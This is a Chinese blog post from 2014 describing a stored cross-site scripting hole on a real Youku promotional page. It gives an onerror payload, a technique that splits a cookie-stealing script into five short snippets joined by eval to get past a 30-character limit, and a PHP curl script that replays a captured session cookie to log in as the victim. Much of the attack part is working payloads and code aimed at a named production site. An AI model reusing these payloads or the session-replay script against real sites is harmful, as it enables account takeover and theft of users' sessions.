巧用eval 进行xss攻击 — 优酷安全漏洞之未过滤HTML参数

作者: iam3y.com 分类: 安全 发布时间: 2014-12-04 09:52 ė 61条评论

某天闲的蛋疼逛了了优酷的一些页面,来到 http://minisite.youku.com/autobaojun/ ,看到有表单,就想输入玩玩。

点击我要参加,随便填 123 个表单,弹出浮层。

测试得知 姓名字段没有过滤。

1

但是输入 <img src=# onerror=alert(document.cookie) /> 之后会被截断到 30字符以内。所以,数据库字段设计在 30 字符以内,插入的时候自动截断了。

然后就是比短了,把xss字符缩短至 30字符以内。经分析 其列表页 http://minisite.youku.com/autobaojun/list.php 按照创建时间降序排列,所以,只要构造的30字符以内的xss代码在同一个页面,都可以执行。

构造以下代码:

code 区域
'<script>eval(z);</script>',
		'<script>z+="ookie);"</script>',
		'<script>z+="ent.c";</script>',
		'<script>z+="docum";</script>',
		'<script>z="alert(";</script>',

然后逐条插入,注意插入的顺序,最后执行的脚本在第一条【逆序构造】。页面输入如下:

QQ20131201-14.png

如上,成功拿到cookie.

拿到cookie 之后可以干什么呢?咱们来curl一下,

code 区域
<?php
header("Content-Type:text/html;charset=UTF-8");
$url = "http://www.youku.com/";
$domain = "youku.com";
$cookie = "PHPSESSID=4bkhp740s4hrk2bet7gjcidi02; ykss=350b9b52454a62b056e37289; advideo86850_3=2; advideo87469_2=1; advideo87472_2=2; __ysuid=1385892638755ty7; u=xxx; _l_lgi=27305187; yktk=1%7C1385892764%7C15%7CaWQ6MjczMDUxODcsbm46eXV5YW55ZSx2aXA6ZmFsc2UseXRpZDowLHRpZDow%7Cf8b9139d4a3a19588483a401f167aa84%7C4763ce1b93a8d6fdf3a47b2f6f4d87225769e6e1%7C1; ucup=nn";
function explode_cookie($cookie,$domain) {

	$cookie_arr = explode(";", $cookie);
	
	foreach ($cookie_arr as $cookie_str) {

		list($cookie_key,$cookie_value) = explode("=", $cookie_str);
		$cookie_key = trim($cookie_key);
		setcookie($cookie_key,$cookie_value,1800,'/',$domain);

	}

}

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

explode_cookie($cookie,$domain);

$header = array();

$header[] = "Cookie: {$cookie}\r\n";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$data = curl_exec($ch);
echo $data;
curl_close($ch);

恩,来看curl的页面:

QQ20131201-11.png

,点击上传

QQ20131201-12.png

成功登陆,可以写操作有木有!

呵呵,虽说是个活动页面,但是危害还是有的,数据库截断并不保险。

本文出自 IT P民,转载时请注明出处及相应链接。

本文永久链接: http://www.iam3y.com/?p=1218

一条评论

  1. 王文勇 2015 年 2 月 15 日 下午 4:28 回复

    湿凶好厉害!!!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Ɣ回顶部